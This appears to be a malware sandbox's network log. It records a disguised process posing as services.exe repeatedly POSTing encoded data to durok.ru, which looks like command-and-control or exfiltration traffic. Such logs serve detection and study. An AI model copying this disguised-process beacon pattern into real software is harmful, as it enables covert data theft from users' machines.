                                                                                                                              Data Ascii: 98$>70<**2!]+1)]+/?+3W *Y),%&X&!.\'\<$_$"6)*A)-"0??#]:7<;3.Z Y? -5!Q8V6:'^'.W"3 %.W"]#W0' <#>#(-2&*%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              7 | 192.168.2.4 | 49745 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:19.501445055 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:19.962798119 CET | 2548 | OUT | Data Raw: 5c 5e 5e 5a 54 59 59 51 5e 58 52 54 56 5e 58 55 54 56 5b 5d 56 54 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^ZTYYQ^XRTV^XUTV[]VTSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?1<)V"2,)Q>B"3;",/#9:\(@(0+%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:20.674300909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:20.930618048 CET | 794 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:20 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J%2F94zmmAGtbMqUYz6eAmSfPcmzyt0ejNGphkDBwsNCYFfSW1D2ou5Uf5bn2DWTRNUTVk11zd%2FbdbEdd4pigyqkNcZNQx0NEo35FsFGPgqMKmgCAT2FayZZCxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261672eec729e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5014&min_rtt=1958&rtt_var=6847&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=55282&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              8 | 192.168.2.4 | 49748 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:21.180239916 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:21.537386894 CET | 2548 | OUT | Data Raw: 59 5f 5e 58 54 5a 59 53 5e 58 52 54 56 58 58 57 54 55 5b 5c 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^XTZYS^XRTVXXWTU[\VVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?1<6!"/X%>4'X7/, ,:.94>38_*"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:22.360797882 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:22.625031948 CET | 791 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:22 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nu3u9mu2rN0vyNH8UP90q09Zp0oxN4fAUaDHao5J5ADALmi0V9NUQoilDC3uddPBdmfh9irCGsHjoNKBqieItxevysS5UyGERb3OX9vxXYvShGGjgC8pSlnKkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826171b81543f8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6904&min_rtt=1683&rtt_var=11074&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=33596&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              9 | 192.168.2.4 | 49750 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:23.340255022 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:23.693658113 CET | 2116 | OUT | Data Raw: 5c 5b 5b 5c 54 58 5c 51 5e 58 52 54 56 59 58 52 54 51 5b 5d 56 56 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[\TX\Q^XRTVYXRTQ[]VVS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^+1<Z(!64_86)B"_'[",7%9:+?0X="Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:24.518815041 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:24.775172949 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:24 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrGKMTUiFdozZ7pNMXmzwHFjnw%2FsBwbemUc%2FrTiHB7%2BZJ%2BWDOIf%2FsOwtto2OvD5XAxTkEzpIpEi3CcX3VJSvshyj9ZewDM1HozZs%2BQZNWxfdKaHcnQktPglGkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82617f3aea8ce2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4763&min_rtt=1795&rtt_var=6609&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=57167&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 3e 00 23 14 22 3c 2b 0d 2b 3e 31 0a 3e 08 3e 04 3c 32 29 5d 28 3c 31 0d 2b 01 3c 0a 37 5c 2e 5a 3d 04 24 13 26 0f 26 5c 25 31 2e 5c 05 1d 27 5d 2b 02 2f 01 26 32 31 1c 29 3e 32 43 28 2e 31 5e 24 2c 37 59 20 02 25 04 23 0f 38 5c 38 3c 3c 13 39 02 0e 1d 2b 20 08 58 35 3d 21 51 0c 1f 38 11 35 5f 27 59 27 3e 29 53 36 30 2b 1c 32 06 2a 54 21 3b 2f 1e 33 39 2f 5d 32 20 3b 1e 22 3d 2b 54 2b 3e 3e 13 25 2c 36 05 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>#"<++>1>><2)](<1+<7\.Z=$&&\%1.\']+/&21)>2C(.1^$,7Y %#8\8<<9+ X5=!Q85_'Y'>)S60+2*T!;/39/]2 ;"=+T+>>%,6))%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              10 | 192.168.2.4 | 49751 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:23.405401945 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:23.764278889 CET | 2548 | OUT | Data Raw: 59 5c 5e 5d 54 5b 59 51 5e 58 52 54 56 5b 58 52 54 50 5b 5a 56 54 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^]T[YQ^XRTV[XRTP[ZVTS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+!<+.";-->Z'$#?0U /1:E(;*"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:17:24.593673944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:24.857208967 CET | 794 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:24 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUheuzDURdp2dMF3hZGjXW1VjWVsbevthpPAlgMXVbeiTc7T04QeOyxBAGnMB%2BTSx8UEVeKFUDepKWuuFQolfwFfVcy3KIJwI%2B6itpa9g3oaJWMaiAlrCskF2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82617fa9c743c7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3674&min_rtt=1625&rtt_var=4708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=81012&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              11 | 192.168.2.4 | 49752 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:25.095046043 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:25.443231106 CET | 2548 | OUT | Data Raw: 59 59 5b 5a 54 58 59 5b 5e 58 52 54 56 5c 58 50 54 52 5b 5e 56 56 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[ZTXY[^XRTV\XPTR[^VVSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2#(9W!Y/W=B2_'?Y4<+"<.Y-:8C? /*5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:17:26.273561954 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:26.530343056 CET | 790 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L45S0SjgWkJoNVtrRHmh61Jv7ccNTMbxdvaQcwJX4qeTicMRqu8stdvzgEHOCA2ilACbc14V2UkZd0zNRiHdj3Ry2ZqawfLz0XU0h7pobzrI8CIoVz2oOyUriQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82618a2a2b7cae-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4374&min_rtt=1998&rtt_var=5502&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=69490&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              12 | 192.168.2.4 | 49753 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:26.078680992 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:26.427242994 CET | 2128 | OUT | Data Raw: 5c 5b 5b 5f 54 5b 59 5b 5e 58 52 54 56 5f 58 55 54 56 5b 5a 56 51 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[_T[Y[^XRTV_XUTV[ZVQS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z?W,\<9-!$X8=1P>'!$'/[7<"/>Y.;?V _="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:27.111509085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:27.362562895 CET | 944 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:27 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UDhhjXL31UR97RiqYDezTiPcjc7C20DkQy8nvDEMwLDJ47a8hJuKp6%2B4lyv41HOY1SXKyrcC2ZJLkZSRC5EkB8RJ%2FaGS75OyaNuFP1MN5cxyNkrJzm1NEgOsYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82618f6c948c3c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8894&min_rtt=1889&rtt_var=14719&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=25201&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3d 29 09 52 23 12 23 0c 3f 04 31 0e 29 22 3e 06 3f 32 2d 14 3f 3f 07 0a 3f 06 3f 57 23 2a 3a 59 28 29 2c 10 32 36 32 5a 25 21 2e 5c 05 1d 27 5a 3c 15 33 00 24 21 35 5e 3d 07 2e 41 3d 00 1c 06 30 06 2c 00 23 28 3d 04 22 21 3c 58 2c 3f 34 5b 2d 12 3f 01 3f 30 08 1f 23 2d 21 51 0c 1f 38 56 21 00 2f 58 26 2d 3e 0b 36 56 38 08 26 16 29 0b 21 28 23 51 33 3a 23 10 25 23 06 0b 23 04 2f 54 2b 5b 31 01 25 3f 2d 5c 2a 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y=)R##?1)">?2-????W#*:Y(),262Z%!.\'Z<3$!5^=.A=0,#(="!<X,?4[-??0#-!Q8V!/X&->6V8&)!(#Q3:#%##/T+[1%?-\*%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              13 | 192.168.2.4 | 49754 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:17:26.785809040 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:27.132946968 CET | 2548 | OUT | Data Raw: 5c 5b 5b 58 54 59 59 5b 5e 58 52 54 56 58 58 50 54 52 5b 5f 56 50 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[XTYY[^XRTVXXPTR[_VPSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<_<)%528!W*4^'4?;7,X-98A+3?*%"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:27.963182926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:28.651643991 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:28 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnEQf05NtasD6g%2BmJ6eHrMriQhylWvxZnc%2FYj9qjEAMLtm%2BzTJUWSeuCu0T02wFsuHJ4UGT7K%2BCo612XjsBRu2BwGe18CoNgaRzo5Zf9hESdd8REW%2FlNUZxe4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826194bd8f0f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3746&min_rtt=1575&rtt_var=4933&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=77065&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:28.652121067 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:28 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnEQf05NtasD6g%2BmJ6eHrMriQhylWvxZnc%2FYj9qjEAMLtm%2BzTJUWSeuCu0T02wFsuHJ4UGT7K%2BCo612XjsBRu2BwGe18CoNgaRzo5Zf9hESdd8REW%2FlNUZxe4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826194bd8f0f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3746&min_rtt=1575&rtt_var=4933&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=77065&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:28.896300077 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2092
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:29.228991032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:29.230411053 CET | 2092 | OUT | Data Raw: 59 50 5e 59 54 5b 59 54 5e 58 52 54 56 59 58 50 54 5d 5b 54 56 5f 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^YT[YT^XRTVYXPT][TV_S_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(/(:>"8Z,">7>X3$#? 4Z=-<?#?)%"Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:29.758949995 CET | 949 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qw1avZhEOItO4MZETnxqsagMOFHF5HvLCnrksoCds8xEqLmP67YhusheMkx73s9VxezzQrNyk%2F7INHaeP9sypuUBDa%2BpED7%2BXegX2c5dc2hVQLBNbdXkF3zqBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82619cafb10f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5401&min_rtt=1575&rtt_var=6972&sent=9&recv=12&lost=0&retrans=0&sent_bytes=850&recv_bytes=5254&delivery_rate=1697674&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
